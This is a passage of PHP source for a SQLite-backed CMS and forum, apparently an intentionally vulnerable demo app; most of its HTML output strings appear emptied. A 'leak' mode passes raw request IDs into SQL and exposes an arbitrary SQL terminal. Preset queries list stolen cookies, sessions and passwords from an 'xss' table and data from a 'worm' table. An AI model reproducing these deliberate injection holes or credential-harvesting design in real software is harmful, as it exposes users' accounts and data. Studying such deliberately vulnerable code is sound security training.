insert into [cms] ([create],[change],[status],[name],[description],[content])
values( datetime('now','localtime'),datetime('now','localtime'),
$var,
'$post[name]',
nullif('".$sql['es']($post['description'])."',''),
nullif('".$sql['es']($post['content'])."',''))");
$id = $content = true;
$request = ($post['name'] != '') ? "$post[name] " : ' ';
}
elseif(isset($_POST['remove']) and $id and $status/2%2) {
$sql['e']($conn,"delete from [cms] where id = $id");
$id = $post = false;
}
}
else
$post = false;
if(!$id and $q !== false)
$id = $sql['sq']($conn,"select id from [cms] where name like '".$sql['es']($q)."'");
if(!$post and $id and $var = $sql['aq']($conn,"
select id,
name,
strftime('%s',change) as change,
strftime('%s',[create]) as 'create',
status%2 as menu,
status/8%2 as public,
status/2%4 as right,
description,
content
from [cms]
where id = $id",SQLITE_ASSOC))
$post = reset($var);
elseif(!$post)
$post = array('id' => 0, 'name' => '', 'menu' => 0, 'public' => 0, 'right' => -2, 'description' => '', 'content' => '', 'create' => '', 'change' => '');
if(count($_POST) and $post['content'] != '' and $creolevar = array_merge($creolevar,array('type' => 'cms', 'id' => $post['id'], 'name' => $post['name'], 'create' => $post['create'],
'change' => $post['change'], 'name' => $post['name'], 'title' => $post['description'], 'right' => $post['right'], 'from' => $sql['sq']($conn,'select username from user where status/2%2 = 1'))))
$out .= "
";
}
}
}
if($sql) {
# SQLite-Terminal mit Option auf vorgegegebenen Querys der XSS-Attacken
if(($leak and $query or $info[3] != '' or $status/2%2) and $request == 'SQL') {
$val = '';
$q = false;
if($leak) {
$set = (preg_match('/\w+/',$query,$var)) ? $var[0] : ((isset($_POST['preset'])) ? $_POST['preset'] : '');
if($set == "worm")
$q = "
select *
from [worm]
order by id desc
limit 0,25";
elseif(preg_match('/(cookie|account)/',$set))
$q = "
select x.id as ID,
i.hits as Hits,
strftime('%d.%m.%Y %H:%M:%S',[create]) as 'Datum/Zeit',
href as Url,".(($set == 'account') ? "
user as Username,
pass as Password," : "
sess as Session,
data as Cookie,")."
useragent as UserAgent
from [xss] as x
inner join ( select max(id) as id,
count(*) as hits
from [xss]".(($set == 'account') ? "\n\twhere user is not null and pass is not null" : "")."
group by ".(($set == 'cookie') ? "sess,data" : "user,pass")."
) as i on i.id = x.id
order by x.id desc
limit 0,25";
$array = array(
'account' => 'Accountdaten',
'cookie' => 'Cookies und Sessions',
'worm' => 'Daten vom Wurm',
'sqlite' => 'SQLite Mastertabelle');
foreach($array as $key => $var)
$array[$key] = "";
$val = "";
}
if($status/2%2 or $info[3] != '') {
if($leak and $set == 'sqlite')
$q = "select * from $sql[m]";
$array = $sql['sq']($conn,"select name from $sql[m] where type = 'table'");
foreach($array as $key => $var)
$array[$key] = "";
$val = " $val";
if(!$q and isset($_POST['query']) and $_POST['query'] != "")
$q = $_POST['query'];
else
if(isset($_FILES['file']) and !$_FILES['file']['error'] and file_exists($_FILES['file']['tmp_name']))
$q = implode('',$gz['file']($_FILES['file']['tmp_name']));
if(!$q and isset($_POST['table']) and $_POST['table'] != '')
$q = "select * from [".preg_replace('/\W/','',$_POST['table'])."]";
$out = "$info[8]";
}
if($q)
if($result = (isset($_POST['exec']) and ($status/2%2 or $info[3] != '')) ? @$sql['e']($conn,$q) : @$sql['q']($conn,$q)) {
if((!is_object($result) and $var = $sql['c']($conn)) or is_object($result) and !$sql['nf']($result) or (is_bool($result) or !$sql['nf']($result)))
$out .= "
Es wurden ".preg_replace('/^0$/','keine',$var)." Einträge geändert!
";
$out .= "SQLite ".$sql['lv']()." ".php_uname()." (PHP ".phpversion()."/".php_sapi_name().") - Charset: ".$sql['lc']()."";
}
# Forum Formular
if($request == 'Beitrag' and ($uid or $gast) and $rw) {
if(!$id and isset($_POST['id']) and preg_match('/^\d+$/',$_POST['id'],$var))
$id = $var[0];
if($id and ($var = $sql['aq']($conn,"
select f.id as id,
strftime('%s',f.[create]) as 'create',
strftime('%d.%m.%Y %H:%M:%S',f.[create]) as crdatum,
strftime('%s',f.change) as change,
strftime('%d.%m.%Y %H:%M:%S',f.change) as chdatum,
f.changes as changes,
f.title as title,
f.message as message,
f.status,
ifnull(f.status%2,'-1') as right,
u.status,
u.username as username,
f.userid as userid,
f.mailid as mailid
from [forum] as f
left join user as u on f.userid = u.id and f.status".(($status%4 == 0) ? "%2 = 0" : " is not null")." and u.status is not null
where f.id = $id and (f.mailid is null or f.mailid = nullif('$uid',''))
limit 1"))) {
$var = reset($var);
$creolevar = array_merge($creolevar,array('type' => 'forum', 'id' => $var['id'], 'name' => $var['id'], 'title' => $var['title'], 'create' => $var['create'], 'right' => $var['right'], 'from' => $var['username']));
if(!isset($_POST['message']))
$out .= " ";
}
else
$var = array('id' => '');
$val = preg_replace($phtml[0],$phtml[1],((isset($_POST['title'])) ? $_POST['title'] : ((isset($var['title'])) ? $var['title'] : "")));
$line = preg_replace($phtml[0],$phtml[1],((isset($_POST['message'])) ? $_POST['message'] : ((count($var) > 1 and $var['mailid'] === $var['userid']) ? $var['message'] : '')));
if(isset($_REQUEST['mail']))
$wrt = $_REQUEST['mail'];
elseif(isset($var['mailid']))
$wrt = $var['mailid'];
else
$wrt = false;
if(isset($_POST['message']))
$out .= " ";
$usr = $sql['aq']($conn,"
select u.id as id,
u.username as username
from [user] as u
left join [user] as s on u.id = s.id and s.id ".(($uid) ? "= $uid" : "is null")."
where u.status is not null
order by s.id desc,u.username");
foreach($usr as $k => $v)
$usr[$k] = "";
$k = (isset($_REQUEST['mail']) and preg_match('/\d+/',$_REQUEST['mail'],$v) and $k = $sql['aq']($conn,"select username,tagline from [user] where id=$v[0]")) ? array($k[0]['username'],(($leak or is_null($k[0]['tagline'])) ? $k[0]['tagline'] : strtr($k[0]['tagline'],array_slice($html,1)))) : false;
$out .= "";
}
# Benutzerprofil anzeigen
if(preg_match('/(Profil|Bearbeiten)/',$request)) {
$var = ($mid) ? $mid : (($id) ? $id : $uid);
if((!$lone or $user or $uid) and $var) {
if($usr = $sql['aq']($conn,"
select (select count(*)
from [forum]
where userid = $var and mailid is null and status".(($status%4 == 0) ? "%2 = 0" : " is not null").")
||','|| (select count(*)
from [forum]
where userid = $var and mailid is not null and status is not null)
||','|| (select count(*)
from [forum]
where userid = $var and mailid is not null and status is not null and status/2%2 = 0)
||','|| (select count(*)
from [forum]
where mailid = $var and userid != $var and status is not null)
||','|| (select count(*)
from [forum]
where mailid = $var and userid != $var and status is not null and status/2%2 = 0)
||','|| (select count(*)
from [forum]
where mailid = userid and userid = $var and status".(($status%4 == 0) ? "%2 = 0" : " is not null").")
||','|| (select count(*)
from [file]
where user=$var and status ".(($status%4 == 0) ? '' : '<')."= 1)
||','|| (select sum(abs(size))
from [file]
where user=$var and status is not null) as count,
*
from [user] as u
where ".(($status/2%2) ? "" : "status is not null and ")."id=".((isset($_GET['id']) and $_GET['id']) ? (($leak) ? $_GET['id'] : preg_replace('/\D/','',$_GET['id'])) : (($var) ? $var: $uid)))) {
$usr = reset($usr);
if(isset($usr['id']))
@$creolevar = array_merge($creolevar,array('type' => 'profil', 'id' => $usr['id'], 'name' => $usr['username'], 'from' => $usr['username'], 'title' => $usr['tagline'], 'create' => strtotime($usr['create']), 'change' => strtotime($usr['change']), 'right' => ((is_null($usr['status'])) ? -1 : ($usr['status']/2%2))));
$v = "
";
$k = substr($v,0,-1)." nowrap>";
if(isset($usr['passhelp']) and preg_match('/^(\d+)-(?:(.+):)?(.+)$/',$usr['passhelp'],$val) and isset($pass[$val[1]]))
$usr['passhelp'] = array((($val[2] != '') ? $val[2] : $pass[$val[1]]),$val[3]);
if(substr_count($usr[0],",") < 6)
$usr[0] .= ",0,0,0,0,0,0,0";
$val = explode(',',$usr[0]); // count,mailout,newout,mailin,newin,blog,upload,bytes
if(($uid == $var or $status/2%2) and isset($usr['id']) and $usr['id']) {
$out .= "
";
$request = 'Mitglieder';
}
}
else
$request = 'Mitglieder';
}
# Benutzerprofil Formular
if($request == 'Bearbeiten' and $uid and $rw)
$out .= "
";
# Mitglieder
if($request == 'Mitglieder' and (!$lone or $user or $uid)) {
$data = (($id and $status/2%2) ? "" : "\n\twhere u.status is not null");
$num = $sql['sq']($conn,"select count(*) from [user] as u$data");
if($page[0] == '')
$page = array(1,"page=1");
preg_replace($paging[5],$paging[6],"$num,$max,#key#");
if($rows = $sql['aq']($conn,"
select u.username as username,
u.[create],
u.change,
f.count as count,
m.bcount as blogs,
m.count as mails,
d.count as files,
u.status/4%2||','||ifnull(u.chat,'-'),
u.status/2%2,
u.status%2,
u.page as page,
u.forename as fore,
u.lastname as last,
u.ip as ip,
u.id as id,
u.chat as chat,
u.mail as mail,
u.status as status,
u.useragent as agent,
u.tagline as tagline,
p.id as profil,
s.id as script,
strftime('%d.%m.%Y %H:%M',u.[create]) as angemeldet,
strftime('%d.%m.%Y %H:%M',u.change) as aktion,
f.userid as userid,
m.mid as mailid,
m.rcount as rcount,
d.pcount as pcount,
t.tcount as tcount,
c.username as chatuser
from [user] as u
left join ( select userid,
count(*) as count
from [forum]
where status".(($status%4 == 0) ? "%2 = 0" : " is not null")." and mailid is null
group by userid) as f
on f.userid = u.id
left join ( select u.id as mid,
count(f.id)-count(b.id) as count,
count(b.id) as bcount,
count(m.id)-count(r.id) as rcount
from [user] as u
left join [forum] as f on f.userid = u.id or f.mailid = u.id
left join [forum] as r on r.id = f.id and r.mailid = u.id and r.status/2%2 = 1
left join [forum] as m on m.id = f.id and m.mailid = u.id
left join [forum] as b on b.id = f.id and b.mailid = u.id and b.mailid = b.userid and b.status".(($status%4 == 0) ? "%2 = 0" : " is not null")."
where f.status is not null and f.mailid is not null
group by u.id) as m
on m.mid = u.id
left join ( select a.user,
count(*) as count,
count(p.id) as pcount
from [file] as a
left join [file] as p on p.id = a.id and p.status/2%2 = 0
where a.status is not null
group by a.user) as d
on d.user = u.id
left join ( select userid,
count(*) as tcount
from [forum] as t
where path is null and mailid is null and t.status is not null
group by userid) as t
on t.userid = u.id
left join [user] as p on p.id = u.id and p.profil is not null
left join [user] as s on s.id = p.id and s.profil like '%%'
left join [user] as c on c.id = u.chat"
.$data.preg_replace($sorth[2],$sorth[3],"u.username;13;u.username")."
limit $val,$max")) {
$row = array();
foreach($rows as $var)
$row[] = "
";
$out .= "";
}
}
# Anmelde Formular
if(preg_match('/^(Dat|Anmeld)en$/',$request) and ($uid or $user) and $rw) {
if($uid) {
$array = reset(($sql['aq']($conn,"select * from [user] where id=".(($status/2%2 and isset($_REQUEST['id']) and preg_match('/\d+/',$_REQUEST['id'],$var)) ? $var[0] : $uid),SQLITE_ASSOC)));
if($status/2%2)
$array['userpass'] = $array['password'];
elseif($array['password'] == '')
$post['userpass'] = '';
unset($array['password']);
if(preg_match('/^(\d+)-(?:(.+):)?(.+)$/',$array['passhelp'],$var)) {
if(!$post['question'] = $var[1])
$post['myquestion'] = $var[2];
$post['answer'] = $var[3];
}
foreach($array as $key => $var)
if(!isset($post[$key]) or strtolower($post[$key]) == strtolower($var))
$post[$key] = $var;
}
$out .= '
';
if($request == "Anmelden" and $register)
$out .= "
".@preg_replace(array_keys($creole),array_values($creole),strtr($sql['sq']($conn,"
select content
from cms
where name like '$register'
limit 1"),array_slice($html,1)))."
";
}
# Kennwort Vergessen Formular
if($request == 'Kennwort' and !$uid and $rw)
$out .= '
';
# Suchformular
if($request == 'Suche') {
$usr = $sql['aq']($conn,"
select u.id as id,
username as username,
count(a.id) as acount,
count(b.id) as bcount,
ifnull(dcount,0) as dcount,
count(f.id) as fcount,
count(m.id) as mcount,
max( ifnull(max(a.[create]),0),
ifnull(max(d.ctime),0)) as time
from ( select 0 as id, 'Unbekannt' as username
union
select id,username
from [user] as u
where status is not null) as u
left join ( select user,count(*) as dcount,[create] as ctime
from file
where status ".(($status%4 == 0) ? '' : '<')."= 1
group by user) as d on u.id = d.user
left join forum as a on u.id = a.userid
and a.status".(($status%4 == 0) ? "%2 = 0" : " is not null")."
left join forum as b on a.id = b.id
and b.mailid = b.userid
left join forum as f on a.id = f.id
and f.mailid is null
left join forum as m on a.id = m.id
and m.mailid is not null
and m.mailid != m.userid
".(($status/2%2) ? '' : str_replace('x',(($uid) ? $uid : 0),"and (m.mailid = x or m.userid = x)"))."
group by u.id
having acount > 0 or dcount > 0
order by username");
$wrt = array('b' => 0, 'd' => 0, 'f' => 0, 'm' => 0);
$array = array();
$val = 0;
foreach($usr as $key => $var) {
$usr[$key] = "";
$array[$var['id']] = $var['id'];
if($val < $a = strtotime($var['time']))
$val = $a;
foreach(array_keys($wrt) as $a) {
$array[$var['id']] .= ','.$var[$a.'count'];
if($var[$a.'count'])
$wrt[$a] += $var[$a.'count'];
}
}
$rows = array();
if($wrt['b'])
$rows[] = "";
if($var = $sql['sq']($conn,"select count(*) from [cms] where status/8%2".(($status/2%2) ? "" : " and status/2%4 <= ".($status/2%2 + $status%2*2))))
$rows[] = "";
if($wrt['d'])
$rows[] = "";
if($wrt['f'])
$rows[] = "";
if($wrt['m'])
$rows[] = "";
$line = array();
foreach(array(1,2,3,5,10,20,25,50,75,100) as $var)
$line[] = "";
$out .= "